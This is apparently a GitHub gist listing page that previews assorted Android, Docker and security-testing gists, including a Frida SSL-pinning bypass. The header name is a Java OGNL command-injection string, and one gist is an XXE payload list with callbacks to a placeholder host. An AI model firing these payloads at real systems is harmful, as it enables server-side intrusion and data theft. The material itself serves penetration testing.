💣
/${@𝚓𝚊𝚟𝚊.𝚕𝚊𝚗𝚐.𝚁𝚞𝚗𝚝𝚒𝚖𝚎@𝚐𝚎𝚝𝚁𝚞𝚗𝚝𝚒𝚖𝚎().𝚎𝚡𝚎𝚌("𝚆𝚃𝙵 𝙰𝚝𝚕𝚊𝚜𝚜𝚒𝚊𝚗")}/

ᄃΉЯIƧƬӨPΉΣЯ (BᄂΣᄃKMΛПП-)DЯΣΉΣЯ schniggie

@gitclone-url
gitclone-url / Boot image extraction guide.md
Last active May 5, 2025 07:19
Guide on how to extract boot image from any android phone without needing to root using magisk and without custom recovery.

Boot Image Extraction Guide

Guide on how to extract a boot image from any Android phone without needing to root using Magisk and without a custom recovery.

Most Android users face hurdles when attempting to root their phones because they require a boot image for patching, and custom recoveries specifically designed for their devices are often unavailable. Additionally, finding the phone firmware online can be challenging. As a result, rooting such phones becomes a daunting task. In this guide, I'll provide a comprehensive solution for users who want to extract the boot image from their phone without the need to root it first, download firmware from the internet, or rely on custom recoveries.

Getting started!

Before diving into the guide, please thoroughly review the Frequently Asked Questions (FAQ) to understand the basics of GSI and the various naming conventi

@incogbyte
incogbyte / mixunpin.js
Last active April 21, 2025 03:21
Frida script to bypass common methods of sslpinning Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
'''
Based on the initial work of Digininja at https://github.com/digininja/CeWL. While CeWL is a script written
in Ruby that requires an independent crawl of a website in order to build a custom wordlist, Whey CeWLer
runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist. It
does not have the meta data parsing capabilities that CeWL does, but it more than makes up for it in
convenience.
The name gets its origins from the CeWLer portion of the CO2 Burp extension by Jason Gillam, which is written
in Java and does something similar, but Whey CeWLer is a completely reimagined extension written in Python,
making it "way cooler".
@FreddieOliveira
FreddieOliveira / docker.md
Last active May 9, 2025 16:53
This tutorial shows how to run docker natively on Android, without VMs and chroot.

Docker on Android 🐋📱

Edit 🎉

All packages except Tini have been added to termux-root. To install them, simply run pkg install root-repo && pkg install docker. This installs the whole Docker suite, leaving only Tini to be compiled manually.


Summary

@coaxial
coaxial / README.md
Last active April 27, 2025 16:49
unpinning SSL certs on Android apps with Frida to inspect network traffic with mitmproxy

Most of the time, applications won't pin the certificate. Running mitmproxy and passing all Android traffic through it is as simple as adb connect <IP> && adb shell settings put global http_proxy <mitmproxy host>:<mitmproxy port> (or use Android's UI).

Some applications, however, pin the certificate and will refuse to do any network calls if using mitmproxy.

Luckily, Frida is here!

This assumes Android x86 is running in a VM, that you are a developer in Android (tap the build version enough times), adb debugging is enabled, and that android tools are installed on the host.

  • start mitmproxy on host
  • visit mitm.it on the target (after setting the proxy) and install the spoofed cert
@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@oofnikj
oofnikj / answerfile
Last active May 6, 2025 17:44
Install Docker on Termux
KEYMAPOPTS="us us"
HOSTNAMEOPTS="-n alpine"
INTERFACESOPTS="auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
hostname alpine
"
TIMEZONEOPTS="-z UTC"
@glowinthedark
glowinthedark / generate_directory_index_caddystyle.py
Last active April 22, 2025 19:12
Generate directory index (recurse subfolders with `-r` or `--recursive`). Use `-h` or `--help` for all options ❗️superseded by https://github.com/glowinthedark/index-html-generator
#!/usr/bin/env python3
# NOTE: this script is deprecated;
# maintained version with SVG icons: https://github.com/glowinthedark/index-html-generator/
# ---
# Copyright 2020 glowinthedark
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@gpoole
gpoole / README.md
Last active April 5, 2025 14:14
Xen/XCP-ng script to attach physical USB devices via passthrough to a VM

XCP-ng USB passthrough tools

A set of command line tools and a service to make setting up passthrough USB devices easier:

  • add-custom-usb-policies - script to store and apply custom USB policies required for specific devices
  • attach-usb-devices - script and service to automatically connect USB devices to VMs when XCP-ng boots up
  • plug-usb - attach a physical USB device to a VM in one command
  • unplug-usb - remove a physical USB device from a VM in one command

To set up, copy the files onto your server and run install.sh to copy everything and set up the service.
